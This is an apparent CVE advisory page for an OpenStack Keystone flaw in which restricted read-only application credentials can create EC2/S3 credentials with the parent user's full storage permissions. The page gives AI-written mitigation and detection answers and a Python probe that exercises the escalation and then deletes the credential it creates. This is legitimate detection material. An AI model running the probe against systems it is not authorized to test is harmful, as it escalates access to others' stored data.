CVE-2026-33551
Status: Received - Intake
Privilege Escalation via EC2 Credential Creation in OpenStack Keystone

Publication date: 2026-04-10

Last updated on: 2026-04-10

Assigner: MITRE

Description
An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-04-10
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Showing 4 associated CPEs

Vendor     Product   Version / Range
openstack  keystone  From 14.0.0 (inc) to 26.1.1 (exc)
openstack  keystone  27.0.0
openstack  keystone  28.0.0
openstack  keystone  29.0.0
CWE
CWE-863 (Incorrect Authorization): The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation is to apply the patch for your OpenStack Keystone release. The fix adds the missing enforcement of application credential restrictions to the EC2 credential creation endpoint, so that a restricted application credential can no longer mint an EC2 credential that carries more than its own roles.

Patches have been submitted for multiple OpenStack branches, including 26.1.1, 27.0.1, 28.0.1, and 29.0.1.

If patching is not immediately possible, disable or restrict the use of restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) until the fix is applied. The exposure exists only where both are in use.

Additionally, review and tighten the policies that govern EC2 credential creation and deletion. The deletion endpoint currently allows a restricted application credential to delete EC2 credentials because of the policy settings, so the policy side deserves review alongside the code fix.


Can you explain this vulnerability to me?

CVE-2026-33551 is a vulnerability in OpenStack Keystone affecting versions 14 through 26 before 26.1.1, as well as versions 27.0.0, 28.0.0, and 29.0.0. A restricted application credential is meant to act only with the roles delegated to it (in the reported case, just reader). The EC2 credential creation API does not apply that restriction: a caller authenticated with such a credential can create an EC2/S3 credential, and the resulting credential carries the full set of the parent user's S3 permissions rather than the reduced set of the application credential. The role restriction is therefore bypassed.

The vulnerability specifically affects deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api). The root cause is a missing authorization check (CWE-863): the EC2 credential creation endpoint does not enforce the restrictions attached to the application credential that is calling it, which allows privilege escalation.


How can this vulnerability impact me?

This vulnerability allows an authenticated user holding only a restricted, read-only application credential to escalate privileges by creating an EC2 credential that grants the parent user's full read-write access to the project's S3-compatible object storage. A principal that should have had read-only access can then read, modify, or delete objects, potentially leading to unauthorized data access, modification, or destruction.

Such unauthorized access could compromise the confidentiality and integrity of stored data, leading to data breaches or loss. The impact is limited to environments that use restricted application credentials together with the EC2/S3 compatibility API.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection means checking whether a restricted application credential that carries only the reader role can create an EC2 credential, which a patched Keystone refuses.

The check is a direct proof of concept: authenticate with a restricted application credential and attempt to create an EC2 credential. On a vulnerable Keystone the creation succeeds; on a patched one it is rejected with a policy denial (HTTP 403).

Specifically, test the EC2 credential creation endpoint (`POST /v3/users/{user_id}/credentials/OS-EC2`, with the project id as `tenant_id` in the body) using a token obtained from a restricted application credential that has only the reader role. Keystone marks the token with the application credential's `restricted` flag, so the token response also lets you confirm you are testing the right kind of credential.

If the API returns a new access/secret pair (HTTP 201) instead of refusing the request, the vulnerability is present. The EC2 credential that is created is a real, usable S3 credential, so run the check as a test user on a non-production project and delete the credential afterwards.

With the OpenStack CLI, the equivalent is to create the test credential as a user that holds reader on a project (`openstack application credential create --role reader --restricted <name>`; restricted is also the default), export its id and secret as `OS_APPLICATION_CREDENTIAL_ID` / `OS_APPLICATION_CREDENTIAL_SECRET`, and run `openstack ec2 credentials create`. Success means the deployment is vulnerable; a 403 means it is not.
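The probe described above, as an added example that is not part of this advisory page and not code from the OpenStack Keystone project. It authenticates with an application credential, confirms from the token that the credential is restricted, attempts the EC2 credential creation call, classifies the outcome, and deletes the credential if one was created. The request and response shapes follow the public Keystone v3 API; the environment variable names, the assumption that `OS_AUTH_URL` ends in `/v3`, and the embedded sample token response are assumptions made for this example.

```python
"""Added example: probe for the CVE-2026-33551 condition in OpenStack Keystone.

Not code from the advisory or from Keystone.  Helpers are pure so they can be
checked offline against the constructed sample below; main() does the network
round-trip.  Assumed: OS_AUTH_URL ends in /v3 and the OS_APPLICATION_CREDENTIAL_*
variables hold a *restricted* application credential with only the reader role.
"""
import json
import os
import sys
import urllib.error
import urllib.request
from typing import Any, Dict, Optional, Tuple

# Constructed sample of a POST /v3/auth/tokens response (not captured from a real
# deployment), shaped like Keystone's: token id in X-Subject-Token, details in JSON.
SAMPLE_TOKEN_HEADERS = {"X-Subject-Token": "gAAAAAsampletoken"}
SAMPLE_TOKEN_BODY = {"token": {
    "user": {"id": "u-reader"}, "project": {"id": "p-test"},
    "roles": [{"id": "r1", "name": "reader"}],
    "application_credential": {"id": "ac1", "name": "probe", "restricted": True},
}}


def auth_body(app_cred_id: str, app_cred_secret: str) -> Dict[str, Any]:
    """Token request body for Keystone's application_credential auth method."""
    return {"auth": {"identity": {
        "methods": ["application_credential"],
        "application_credential": {"id": app_cred_id, "secret": app_cred_secret},
    }}}


def parse_token(headers: Dict[str, str], body: Dict[str, Any]) -> Dict[str, Any]:
    """Extract token id, user, project, roles and the restricted flag from a token response."""
    lower = {k.lower(): v for k, v in headers.items()}
    tok = body["token"]
    return {
        "token": lower["x-subject-token"],
        "user_id": tok["user"]["id"],
        "project_id": tok["project"]["id"],
        "roles": sorted(r["name"] for r in tok.get("roles", [])),
        "restricted": tok.get("application_credential", {}).get("restricted"),
    }


def ec2_create_request(user_id: str, project_id: str) -> Tuple[str, Dict[str, str]]:
    """Path (relative to the /v3 base) and body of the EC2 credential creation call."""
    return f"/users/{user_id}/credentials/OS-EC2", {"tenant_id": project_id}


def classify(status: int, body: Optional[Dict[str, Any]]) -> str:
    """201 with an access/secret pair means the restricted credential escalated;
    403 (policy denial) is the patched behaviour; anything else is inconclusive."""
    cred = (body or {}).get("credential", {})
    if status == 201 and "access" in cred and "secret" in cred:
        return "VULNERABLE"
    if status == 403:
        return "NOT VULNERABLE"
    return f"INCONCLUSIVE (HTTP {status})"


def _call(url: str, method: str, token: Optional[str] = None,
          body: Optional[Dict[str, Any]] = None):
    """Minimal JSON round-trip returning (status, headers, parsed body or None)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("X-Auth-Token", token)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            raw = resp.read()
            return resp.status, dict(resp.headers), (json.loads(raw) if raw else None)
    except urllib.error.HTTPError as err:
        raw = err.read()
        try:
            parsed = json.loads(raw) if raw else None
        except ValueError:
            parsed = None
        return err.code, dict(err.headers), parsed


def main() -> int:
    base = os.environ["OS_AUTH_URL"].rstrip("/")  # assumed to end in /v3
    status, headers, body = _call(f"{base}/auth/tokens", "POST", body=auth_body(
        os.environ["OS_APPLICATION_CREDENTIAL_ID"],
        os.environ["OS_APPLICATION_CREDENTIAL_SECRET"]))
    if status != 201:
        print(f"auth failed: HTTP {status} {body}")
        return 2
    info = parse_token(headers, body)
    if info["restricted"] is not True:
        print("token is not from a restricted application credential; test is meaningless")
        return 2
    print(f"roles={info['roles']} restricted={info['restricted']}")
    path, create_body = ec2_create_request(info["user_id"], info["project_id"])
    status, _, body = _call(base + path, "POST", info["token"], create_body)
    verdict = classify(status, body)
    print(verdict)
    if verdict == "VULNERABLE":
        # The advisory notes the delete endpoint is reachable with the same credential;
        # remove the real S3 credential the probe just minted.
        _call(f"{base}{path}/{body['credential']['access']}", "DELETE", info["token"])
    return 1 if verdict == "VULNERABLE" else 0


if __name__ == "__main__":
    sys.exit(main())
```

Exit status 1 flags a vulnerable deployment, 0 a patched one, and 2 an inconclusive run (authentication failure or an unrestricted credential), so the script can sit in a scheduled check. The `restricted` check matters: an unrestricted application credential is allowed to create EC2 credentials, so a 201 from one says nothing about this CVE.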


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows an authenticated user with only a restricted application credential and a reader role to create EC2/S3 credentials that inherit the full set of the parent user's S3 permissions, effectively bypassing role restrictions. This escalation of privileges can lead to unauthorized access to sensitive data stored in S3-compatible storage.

Such unauthorized access and privilege escalation could potentially lead to violations of data protection regulations and standards like GDPR and HIPAA, which require strict access controls and protection of sensitive data. If an attacker exploits this vulnerability, it may result in unauthorized data exposure or modification, thereby impacting compliance with these regulations.

However, the vulnerability only affects deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api), so the compliance impact depends on the specific deployment configuration.

